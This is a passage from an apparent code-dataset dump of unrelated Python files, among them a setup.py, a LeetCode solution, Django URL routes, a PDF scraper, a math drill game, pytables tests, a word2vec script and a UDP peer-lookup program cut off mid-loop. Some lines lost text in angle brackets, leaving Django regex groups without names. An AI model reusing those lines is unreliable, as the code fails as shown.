In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3', \n ],\n # metadata for upload to PyPI\n author = 'William Marquardt',\n author_email = 'williammqt@gmail.com',\n description = 'Python lib that consume F2b API.',\n long_description = long_description,\n license = 'MIT',\n keywords = 'python f2b cobranca',\n url = 'https://github.com/wmarquardt/pyf2b',\n install_requires=[\n 'requests',\n ],\n)\n","sub_path":"pypi_install_script/pyf2b-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"265349504","text":"#\n# @lc app=leetcode.cn id=279 lang=python3\n#\n# [279] 完全平方数\n#\nfrom typing import *\n# @lc code=start\nclass node:\n def __init__(self,value,step=0):\n self.value = value\n self.step = step\n def __str__(self):\n return ''.format(self.value,self.step)\n\n\nclass Solution:\n def numSquares(self, n: int) -> int:\n queue = [node(n)]\n visited = set([node(n).value])\n \n while queue:\n vertex = queue.pop(0)\n residuals = [vertex.value - n*n for n in range(1,int(vertex.value**.5)+1)]\n for i in residuals:\n new_vertex = node(i, vertex.step+1)\n if i==0: \n return new_vertex.step\n \n elif i not in visited:\n queue.append(new_vertex)\n visited.add(i)\n \n return -1\n# @lc code=start","sub_path":".leetcode/279.完全平方数.py","file_name":"279.完全平方数.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"710900","text":"import json\n\nclass manager:\n \"\"\"\n read and write a json file\n \"\"\"\n def __init__(self, path, default_datas):\n self.datas = None\n self.path = path\n self.default_datas = default_datas\n\n self.read_file()\n\n def read_file(self):\n \"\"\"\n Read the file and save the converted data to self.datas\n Also check and andle read errors\n \"\"\"\n try:\n print(\"laoding\", self.path)\n file_read = open(self.path, \"r\")\n self.datas = json.load(file_read)\n file_read.close()\n\n # check and reset if keys are mising ; WILL NORMALY NEVER APPEND\n for key in self.default_datas.keys():\n if key not in self.datas:\n print(\"XXX key \\\"\" + key + \"\\\" not found. key will be created\")\n self.datas[key] = self.default_datas[key]\n self.write_datas(reason=\"key missing\")\n\n print(self.path, \"file loaded\")\n print(\"datas : \")\n print(self.datas)\n\n # if we were not able to find the file\n except FileNotFoundError:\n print(\"XXX\", self.path, \"not found. File will be created\")\n # we create the file with it's default datas\n self.datas = self.default_datas\n self.write_datas(reason=\"file not found\")\n\n # if there is an error while trying to read the file\n except json.decoder.JSONDecodeError:\n print(\"XXX\", self.path, \"error while trying to read file. 
File will be reset to default\")\n self.datas = self.default_datas\n self.write_datas(reason=\"reseting file\")\n\n def write_datas(self, reason=\"None\"):\n \"\"\"\n write the value of self.datas to the json file\n \"\"\"\n file_write = open(self.path, \"w\")\n json.dump(self.datas, file_write, indent=4)\n file_write.close()\n print(self.path, \"file created or updated, reason : \" + reason)\n print(\"datas : \")\n print(self.datas)","sub_path":"python_source_code/json_data_file_manager.py","file_name":"json_data_file_manager.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"48190586","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.usuario_list),\n url(r'^usuario/(?P[0-9]+)/$', views.usuario_detail),\n url(r'^usuario/new/$', views.usuario_new, name='usuario_new'),\n url(r'^medico/(?P[0-9]+)/$', views.medico_detail),\n url(r'^medico/edit/(?P[0-9]+)/$', views.medico_edit),\n url(r'^medico/new/$', views.medico_new, name='medico_new'),\n url(r'^medicamento/(?P[0-9]+)/$', views.medicamento_detail),\n url(r'^medicamento/edit/(?P[0-9]+)/$', views.medicamento_edit),\n url(r'^medicamento/delete/(?P[0-9]+)/$', views.medicamento_delete),\n url(r'^medicamento/new/$', views.medicamento_new, name='medicamento_new'),\n]\n","sub_path":"pds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"391333009","text":"from room import *\r\n\r\nenemy_data = {'Wandering Nose':{'HP':14,'ATK':7,'DEF':5},\r\n 'Floating Knutsack':{'HP':26,'ATK':6,'DEF':8},\r\n 'Tendie Thief':{'HP':12,'ATK':12,'DEF':4}}\r\n\r\nclass Enemy(Room):\r\n def __init__(self, room_name, enemy_name):\r\n super().__init__(room_name)\r\n self.name = enemy_name\r\n self.hp = enemy_data[enemy_name]['HP']\r\n self.atk = enemy_data[enemy_name]['ATK']\r\n self.defense = enemy_data[enemy_name]['DEF']\r\n\r\n def enemy_attack(self, target):\r\n if (self.room_name == target.room_name) and (target.hp > 0) and (self.hp > 0):\r\n damage = (self.atk + random.randint(-3,3)) - target.defense\r\n\r\n if damage <= 0:\r\n damage = 0\r\n print(self.name, 'missed!')\r\n else:\r\n target.hp -= damage\r\n if target.hp <= 0:\r\n target.hp = 0\r\n print(target.name, 'was defeated!')\r\n else:\r\n print(self.name, 'dealt', damage, 'damage to', target.name)","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308608904","text":"from glumpy import app, gloo, gl\n\nvertex = \"\"\"\nattribute vec2 position;\nattribute vec4 color;\nvarying vec4 v_color;\nvoid main()\n{\n gl_Position = vec4(position, 0.0, 1.0);\n v_color = color; \n}\n\"\"\"\n\nfragment = \"\"\"\nvarying vec4 v_color;\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\n\ndef main():\n\n window = app.Window()\n quad = gloo.Program(vertex, fragment, count=4)\n quad['position'] = (-1, +1), (+1, +1), (-1, -1), (+1, -1)\n quad['color'] = (1, 1, 0, 1), (1, 0, 0, 1), (0, 0, 1, 1), (0, 1, 0, 1)\n\n @window.event\n def on_draw(dt):\n window.clear()\n quad.draw(gl.GL_TRIANGLE_STRIP)\n\n app.run()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"162449987","text":"\n\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport traceback\nimport requests\nimport PyPDF2\nimport os\nimport uuid\nimport time\n\ndriver_path = r\"C:\\File\\tools\\webdriver\\chromedriver.exe\"\ndriver = webdriver.Chrome(driver_path)\n\n\n\n\ndef download(url, file):\n # time.sleep(random.random()*3+1)\n # proip =find_proxy_ip()\n # print(url)\n header={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}\n\n data = requests.get(url.strip(),headers=header,verify=False,timeout=30)\n # print(data.cookies)\n # print(data.text)\n data.encoding = 'utf-8'\n file = open(file, \"wb+\")\n file.write(data.content)\n\ndef checkpdf(file):\n\n try:\n pdffile = open(file, \"rb+\")\n pdf = PyPDF2.PdfFileReader(pdffile, strict=False)\n num=pdf.getNumPages()\n pdffile.close()\n return num\n except:\n print(\"PDF下载出错。\")\n try:\n pdffile.close()\n os.remove(file)\n except:\n print(\"PDF删除出错.\")\n raise ValueError(\"PDF出错!\")\n\ndef creat_filename(dir):\n uid=str(uuid.uuid1())\n suid=''.join(uid.split('-'))\n return os.path.join(dir,suid+\".pdf\")\n\n\nif __name__ == '__main__':\n\n path=r\"C:\\temp\\ieee.txt\"\n writer=open(r\"C:\\temp\\ieee_w.txt\",\"w+\",encoding=\"utf-8\")\n dir=r\"C:\\pdfs\\osti_o2\"\n f=open(path,encoding=\"utf-8\")\n for url in f.readlines():\n time.sleep(5)\n try:\n url=url.replace(\"\\n\",\"\")\n driver.get(url)\n a=driver.find_element_by_class_name(\"doc-actions-link\")\n a.click()\n soup=BeautifulSoup(driver.page_source,\"html.parser\")\n # print(soup)\n iframe=soup.find_all(\"iframe\")\n\n for item in iframe:\n try:\n\n pdf_url=item[\"src\"]\n except:\n pass\n print(pdf_url)\n try:\n file = creat_filename(dir)\n download(pdf_url, file)\n num = checkpdf(file)\n writer.write(url + \"##\" + pdf_url+ \"##\" + file + \"##\" + str(num) + \"\\n\")\n except:\n traceback.print_exc()\n print(\"下载出错!\")\n except:\n traceback.print_exc()\n\n driver.close()","sub_path":"ieee_pdf.py","file_name":"ieee_pdf.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"394815987","text":"import random\nimport os\nimport time\nfrom colorama import Fore, Style\nimport operator\n\nOPERATOR = '*'\nSTART1 = 2\nEND1 = 13 \nSTART2 = 6\nEND2 = 9 \n\n\n\nclass Question:\n answer_given = 0\n correct = False\n correct_answer = 0\n ops = {\n '+': operator.add,\n '*': operator.mul,\n '-': operator.sub,\n }\n time_taken = 0\n\n def __init__(self, num1, num2, op):\n self.num1 = num1\n self.num2 = num2\n self.op = op\n\n def question_str(self):\n q = '\\n{} {} {} = '.format(self.num1, self.op, self.num2)\n return(q)\n\n def get_answer(self):\n op_func = self.ops[self.op]\n self.correct_answer = op_func(self.num1, self.num2)\n return self.correct_answer\n\n def check_answer(self):\n if self.answer_given == self.get_answer():\n self.correct = True\n else:\n self.correct = False\n return self.correct\n\n\ndef print_msg(msg, correct):\n if correct:\n msg = (\n Fore.GREEN +\n msg +\n Style.RESET_ALL\n )\n else:\n msg = (\n Fore.RED +\n msg +\n Style.RESET_ALL\n )\n print(msg)\n\n\ndef print_bold(msg):\n msg = (\n Fore.BLUE +\n msg +\n Style.RESET_ALL\n )\n print(msg)\n\n\ndef print_head(op):\n if op == '+':\n 
print_bold('Addition Drills')\n print_bold('---------------')\n elif op == '*':\n print_bold('Multiplication Drills')\n print_bold('---------------------')\n elif op == '-':\n print_bold('Subtraction Drills')\n print_bold('------------------')\n\n\nif __name__ == \"__main__\":\n os.system('cls' if os.name == 'nt' else 'clear')\n print(Style.RESET_ALL)\n print_head(OPERATOR)\n total_start = time.time()\n\n q_list = []\n score = 0\n total = 0\n for i in range(START1, END1):\n for j in range(START2, END2):\n if OPERATOR == '-':\n if i > j:\n q = Question(i, j, OPERATOR)\n q_list.append(q)\n else:\n q = Question(i, j, OPERATOR)\n q_list.append(q)\n\n random.shuffle(q_list)\n for rec in q_list:\n start = time.time()\n while True:\n try:\n rec.answer_given = int(input(rec.question_str()))\n break\n except ValueError or EOFError:\n print(\"Please enter a number.\")\n\n if rec.check_answer():\n\n print_msg('Correct!!', rec.check_answer())\n score += 1\n else:\n msg = ('\\aWrong!! The correct answer is {}'.format(rec.correct_answer))\n print_msg(msg, rec.check_answer())\n total += 1\n end = time.time()\n elapsed = time.strftime(\"%M:%S\", time.gmtime(end - start))\n rec.time_taken = elapsed\n total_elapsed = time.strftime(\"%M:%S\", time.gmtime(end - total_start))\n print('Elapsed (mm:ss): {}'.format(elapsed))\n print('Total Elapsed (mm:ss): {}'.format(total_elapsed))\n # print results\n print('\\n-----------------------')\n print('')\n result_str = {\n True: 'Correct',\n False: 'Wrong'\n }\n for i, rec in enumerate(q_list):\n q_str = 'Q{}: {} {} {} = {}, your answer {} is {}, {}'.format(i+1, rec.num1, OPERATOR, rec.num2, rec.correct_answer, rec.answer_given, result_str[rec.correct], rec.time_taken)\n print_msg(q_str, rec.check_answer())\n print('\\n-----------------------')\n print('Score: ' + str(score) + ' / ' + str(total))\n print('Score : {}%'.format((score/total) * 100))\n print('Total Elapsed (mm:ss): {}'.format(total_elapsed))\n print('\\n-----------------------')\n print('\\nBye!! 
and Keep Practicing!!!')\n print(Style.RESET_ALL)\n","sub_path":"drills_plus.py","file_name":"drills_plus.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433925494","text":"import webbrowser\n\n\nclass Movies:\n def __init__(self, movie_title, movie_storyline, poster_image,\n trailer_youtube):\n \"\"\"creates an object movie, with four parameters\n movie title, storyline, poster image and youtube trailer url\n \"\"\"\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n \"\"\"passes the youtube url to the webbrowser method which \n opens a website with the entered url\n \"\"\"\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351208652","text":"import unittest\n\nimport tables as tb\n\nfrom pytables_mapping.tests.consts import *\nfrom pytables_mapping.tests.test_store import CustomTestCase\nimport pytables_mapping as mapping\n\n\nclass TestArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n array = mapping.Array(TEST_ARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n shape=TEST_ANY_ARRAY_SHAPE)\n\n\nclass TestCArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n carray = mapping.CArray(TEST_CARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n expected_rows=TEST_ANY_ARRAY_EXPECTED_ROWS,\n shape=TEST_ANY_ARRAY_SHAPE,\n filters=consts.DEFAULT_DATA_FILTER)\n\n\nclass TestEArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n earray = mapping.EArray(TEST_EARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n expected_rows=TEST_ANY_ARRAY_EXPECTED_ROWS,\n shape=(0,),\n filters=consts.DEFAULT_DATA_FILTER)\n\n\nclass TestVLArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n vlarray = mapping.VLArray(TEST_VLARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n expected_rows=TEST_ANY_ARRAY_EXPECTED_ROWS,\n filters=consts.DEFAULT_DATA_FILTER)\n\n\nclass ArraysMappingTestCase(CustomTestCase):\n\n def test_array(self):\n with TestArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.array.node, tb.Array)\n self.assertIsInstance(store.array.parent_node, tb.group.RootGroup)\n self.assertEqual(store.array.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n store.array[0:TEST_ANY_ARRAY_LENGTH] = TEST_ANY_ARRAY\n self.assertEqual(store.array.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n\n with TestArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.array.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n data1 = list(store.array[0:TEST_ANY_ARRAY_LENGTH])\n data2 = list(store.array.read(stop=TEST_ANY_ARRAY_LENGTH))\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n def test_carray(self):\n with TestCArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.carray.node, tb.CArray)\n self.assertIsInstance(store.carray.parent_node, tb.group.RootGroup)\n self.assertEqual(store.carray.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n store.carray[0:TEST_ANY_ARRAY_LENGTH] = TEST_ANY_ARRAY\n self.assertEqual(store.carray.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n\n with TestCArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.carray.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n data1 = 
list(store.carray[0:TEST_ANY_ARRAY_LENGTH])\n data2 = list(store.carray.read(stop=TEST_ANY_ARRAY_LENGTH))\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n def test_earray(self):\n with TestEArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.earray.node, tb.EArray)\n self.assertIsInstance(store.earray.parent_node, tb.group.RootGroup)\n self.assertEqual(store.earray.nrows, 0)\n store.earray.append(TEST_ANY_ARRAY)\n self.assertEqual(store.earray.nrows, TEST_ANY_ARRAY_LENGTH)\n\n with TestEArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.earray.nrows, TEST_ANY_ARRAY_LENGTH)\n data1 = list(store.earray[0:TEST_ANY_ARRAY_LENGTH])\n data2 = list(store.earray.read(stop=TEST_ANY_ARRAY_LENGTH))\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n def test_vlarray(self):\n with TestVLArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.vlarray.node, tb.VLArray)\n self.assertIsInstance(\n store.vlarray.parent_node,\n tb.group.RootGroup)\n self.assertEqual(store.vlarray.nrows, 0)\n store.vlarray.append(TEST_ANY_ARRAY)\n self.assertEqual(store.vlarray.nrows, 1)\n\n with TestVLArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.vlarray.nrows, 1)\n data1 = list(store.vlarray[0])\n data2 = list(store.vlarray.read()[0])\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pytables_mapping/tests/test_arrays.py","file_name":"test_arrays.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"317975568","text":"#!/usr/bin/env python3\n\nimport os.path\nfrom setuptools import setup, find_packages\n\nbase_dir = os.path.abspath(os.path.dirname(__file__))\n\nabout = {}\nwith open(os.path.join(base_dir, \"result_parser\", \"__about__.py\"),\n encoding='utf-8') as f:\n exec(f.read(), about)\n\nif os.path.isfile(os.path.join(base_dir, 'README.md')):\n with open(os.path.join(base_dir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nelse:\n long_description = ''\n\nsetup(\n name=about['__name__'],\n version=about['__version__'],\n description=about['__summary__'],\n long_description=long_description,\n long_description_content_type='text/markdown',\n url=about['__uri__'],\n author=about['__author__'],\n author_email=about['__email__'],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: System Administrators',\n 'Topic :: System :: Benchmark',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n keywords='benchmark hypervisor',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n python_requires='>=3.6',\n install_requires=['matplotlib'],\n entry_points={\n 'console_scripts': [\n 'result-parser=result_parser:main',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579363553","text":"import logging\n\n\nclass Blocks:\n def __init__(self):\n logging.info(\"Loading block names from 'data/items.tsv\")\n self.data = {}\n with open('data/items.tsv', 'r') as 
fd:\n for line in fd.readlines():\n part = line.strip().split('\\t')\n id = (int(part[0]), int(part[1]))\n image = \"data/png/%d-%d.png\" % id\n self.data[id] = {\n 'id': id,\n 'name': part[2],\n 'image': image\n }\n\n def get(self, id):\n if id not in self.data:\n if id[1] == 0:\n logging.warn(\"Unknown block id %s\" % str(id))\n return {'name': 'Unknown', 'image': '', 'id': id}\n logging.warn(\"Unknown block id %s -> using data from (%d, 0)\" % (str(id), id[0]))\n info = self.get((id[0], 0))\n info['id'] = id\n return info\n return self.data[id]\n\n def name(self, id):\n return self.data[id]['name']\n\n def image(self, id):\n return self.data[id]['image']","sub_path":"buildking/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527522399","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nauthor: xlingbai@gmail.com\nfile: train_word2vec\ndate: 2018/3/30\nbref: 训练word2vec\n\"\"\"\n\nfrom gensim.models import word2vec\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\n\n\n\n\nraw_sentences = ['the quick brown fox jumps over the lazy dogs ', 'yoyoyo you go home now to sleep']\nsentences = [s.split() for s in raw_sentences]\n\nprint(sentences)\n\n# train = pd.read_csv(\"../input/unlabeledTrainData.tsv\", delimiter='\\t')\n\n# print(len(train['review']))\n\n\npath =\"../input/clean_unlabeledTrainData.tsv\"\nsentences = []\n\nwith open(path, \"rb\") as f:\n for line in f:\n sentences.append(str(line, encoding=\"utf-8\").split(\"\\t\")[1].split(\" \"))\n\n\n# print(sentences)\n\nfrom gensim.models import Word2Vec\n\n# 模型参数\nnum_features = 300 # Word vector dimensionality\nmin_word_count = 20 # Minimum word count\nnum_workers = 5 # Number of threads to run in parallel\ncontext = 20 # Context window size\ndownsampling = 1e-3 # Downsample setting for frequent words\n\nprint(\"训练模型中...\")\nmodel = Word2Vec(sentences, workers=num_workers, \\\n size=num_features, min_count=min_word_count, \\\n window=context, sample=downsampling)\n\n# 训练模型中...\n# CPU times: user 6min 16s, sys: 8.34 s, total: 6min 24s\n# Wall time: 2min 27s\nprint('保存模型...')\nmodel.init_sims(replace=True)\nmodel_name = \"./300features_20minwords_20context\"\nmodel.save(model_name)\n","sub_path":"code/kaggle/BagMeetsBagsofPopcorn/code/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189965579","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py as h5\nplt.ion()\n\n\nf = open('pmtlog_file.txt','r')\nlines = f.readlines()\nn = len(lines)\ndata = []\nfor i,line in enumerate(lines):\n data.append(np.fromstring(line, dtype=float, sep=' '))\n print(i, 'of', n, end='\\r')\ndata = np.array(data)\n\ndata = data.T\n\ndata[-1] = data[-1] - data[-1][0]\ntime = data[-1]/60**2\ncounts = data[0]\n\nplt.figure()\n#plt.scatter(time, counts, s=1)\nplt.yscale('log')\n#for i in range(2,6):\n# plt.figure()\n# plt.ylim(data[i].min(), data[i].max())\n# plt.scatter(time, data[i], s=1)\n\n\nm = counts < 2850\n\nmt = time > 38\nmt &= time < 51\nmc = counts > 2400\nm &= ~(mc & mt)\nmt = time > 51\nmt &= time < 53\nmc = counts > 366\nm &= ~(mc & mt)\n\ndc = counts[m]\ntdc = time[m]\nplt.scatter(tdc, dc, s=1, color='b', label='dark counts')\n\nc = counts[~m]\ntc = time[~m]\n#plt.scatter(tc, c, s=1, 
color='r', label='counts')\n\nm1 = c > 10**6\nc1 = c[m1]\nt1 = tc[m1]\nplt.scatter(t1, c1, s=1, color='c', label='OD1')\nm2 = ~m1 & (c > 10**5)\nc2 = c[m2]\nt2 = tc[m2]\nplt.scatter(t2, c2, s=1, color='y', label='OD2')\nm3 = ~m1 & ~m2 & (c > 10**4)\nc3 = c[m3]\nt3 = tc[m3]\nplt.scatter(t3, c3, s=1, color='b', label='OD3')\nm4 = ~m1 & ~m2 & ~m3 & (c > 10**3)\nc4 = c[m4]\nt4 = tc[m4]\nplt.scatter(t4, c4, s=1, color='r', label='OD4')\nm5 = ~m1 & ~m2 & ~m3 & ~m4 & (c > 10**2)\nc5 = c[m5]\nt5 = tc[m5]\nplt.scatter(t5, c5, s=1, color='g', label='OD5')\n\nplt.legend()\n\n#plt.figure()\n#plt.title('OD1')\n#plt.hist(c1, bins='auto')\n#plt.figure()\n#plt.title('OD2')\n#plt.hist(c2, bins='auto')\n#plt.figure()\n#plt.title('OD3')\n#plt.hist(c3, bins='auto')\n#plt.figure()\n#plt.title('OD4')\n#plt.hist(c4, bins='auto')\n#plt.figure()\n#plt.title('OD5')\n#plt.hist(c5, bins='auto')\n\nstd=np.array((np.std(c1),np.std(c2),np.std(c3),np.std(c4),np.std(c5)))\nmean=np.array((np.mean(c1),np.mean(c2),np.mean(c3),np.mean(c4),np.mean(c5)))\nplt.figure()\nplt.scatter(-1, np.std(dc)/len(dc)**0.5/np.mean(dc), label='dc')\nplt.scatter(range(1,6), std/mean, label='std')\nplt.scatter(range(1,6), 1/mean**0.5, label='stat')\nplt.xlabel('OD')\nplt.ylabel('Relative error')\nplt.legend()\n\n\n\n\n\n\n","sub_path":"jakob.py","file_name":"jakob.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281665884","text":"#Import all functions\nimport socket\nimport sys\nimport argparse\nimport threading\nimport time\nimport multiprocessing\nfrom datetime import datetime\n\n#Initialize all global variables\nglobal args \nglobal my_node_no\nglobal connected_peers\nglobal my_key\nglobal debug_mode \ndebug_mode = True\nglobal exited\nexited = False\nglobal sent_datas\nsent_datas = \" \"\nglobal now_sent \nnow_sent= False\nglobal wait_to_recieve\nwait_to_recieve = False\nglobal already_parsed\nalready_parsed = set()\n\nglobal p\n\nbase_port = 50000\nUDP_IP = \"127.0.0.1\"\ntimeout_node = 10\n\n\n#Start all functions\ndef send():\n\t\n\tglobal exited\n\tglobal now_sent\n\tglobal already_parsed\n\tglobal p\n\tglobal wait_to_recieve\n\tglobal sent_datas\n\n\twhile True:\n\t\ttime.sleep(1)\n\t\t#print(end)\n\t\t\n\t\tkey = str(input(\"\\n\\n------\\nEnter key to check value:\"))\n\t\t\n\t\tif key == \"exit\":\n\t\t\texited = True\n\t\tUDP_PORT = base_port+int(my_node_no)\n\n\t\t#Message format -> R ;; from ;; time_sent ;; requsted_key ;; key value ;; nodes traversed\n\n\t\tcurrent_time=str(time.time())\n\t\tMESSAGE = \"R;;\"+str(my_node_no)+\";;\"+current_time+\";;\"+key+\";; value ;;\"\n\t\tsent_datas=str(my_node_no)+current_time\n\n\n\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP\n\t\t\n\t\tfor nodes in connected_peers:\n\t\t\tMESSAGE_SEND2 = (MESSAGE+\"\"+str(my_node_no)+\" -> \")\n\t\t\tsend_port = base_port+int(nodes)\n\n\t\t\tif int(nodes) > int(my_node_no):\n\t\t\t\tprint(\"Message sent to {0}\".format(send_port))\n\t\t\t\tsock.sendto(bytes(MESSAGE_SEND2,\"UTF-8\"), (UDP_IP, send_port))\n\t\t\t\tbreak\n\t\t\t\t\n\n\t\ttime.sleep(5)\n\t\tif sent_datas != \" \":\n\t\t\tprint(\"No message recieved\")\n\t\t\talready_parsed.add(sent_datas)\n\t\t\t\t\t\n\n\n\ndef recieve():\n\n\t\n\tglobal sent_datas\n\tglobal already_parsed\n\n\tUDP_PORT = base_port+int(my_node_no)\n\n\tserverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tserverSock.bind((UDP_IP, UDP_PORT))\n\n\tprint(\"Started listener\\n\")\n\twhile 
True:\n\t\tif exited == True:\n\t\t\tbreak\n\t\t\n\n\n\t\t#Recieve and decode message\n\t\tdata, addr = serverSock.recvfrom(1024)\n\t\t#print(\"Recieved data: {0}\".format(data.decode('utf-8')))\n\t\tmessage1 = data.decode('utf-8')\n\t\tmessage = message1.split(\";;\")\n\t\t\n\t\ttimed_out = time.time() - float(message[2])\n\n\t\trec = str(message[1])+str(message[2])\n\n\t\t\n\t\tif rec not in already_parsed and timed_out<10:\n\n\t\t\tif int(message[1]) == int(my_node_no):\n\t\t\t\tif \"Response\" not in message1:\n\t\t\t\t\tprint(\"Message not recieved\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\n\\n----\\n\\nGot my node :\\n{0}\\n\".format(message))\n\t\t\t\t\tprint(\"Path traversed is:\\n{0}\".format(message[5]))\n\n\t\t\t\t\talready_parsed.add(rec)\n\t\t\t\tsent_datas=\" \"\n\n\t\t\telif int(message[3]) == my_key:\n\n\t\t\t\t\tmessage1 = message1+\" -> \"+str(message[1])\n\t\t\n\t\t\t\t\tmessage1.replace('value',str(my_key*my_key))\n\t\t\t\t\tmessage1.replace(\"R\",str(my_node_no))\n\t\t\t\t\tsend_message = message1+\"\\nResponse : \" +str(my_key*my_key)\n\t\t\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\t\t\tsend_port = base_port+int(message[1])\n\t\t\t\t\tsock.sendto(bytes(send_message,\"UTF-8\"), (UDP_IP, send_port))\n\t\t\t\t\talready_parsed.add(rec)\n\n\n\t\t\telse:\n\t\t\t\tmessage1 = message1+str(my_node_no)+\" -> \"\n\t\t\n\t\t\t\t#Prepare message sending\n\t\t\t\t\n\t\t\t\tsend_message = message1\n\t\t\t\t\n\t\t\t\tset_add = rec\n\n\t\t\t\talready_parsed.add(set_add)\n\n\t\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP\n\t\t\t\tfor nodes in connected_peers:\n\t\t\t\t\tif int(nodes) != int(message[1]):\n\t\t\t\t\t\tif int(nodes) > int(my_node_no):\n\t\t\t\t\t\t\tMESSAGE_SEND = (message1+str(nodes))\n\t\t\t\t\t\t\tsend_port = base_port+int(nodes)\n\t\t\t\t\t\t\tsock.sendto(bytes(MESSAGE_SEND,\"UTF-8\"), (UDP_IP, send_port))\n\t\t\t\t\t\t\tbreak\n\ndef bar():\n\tfor i in 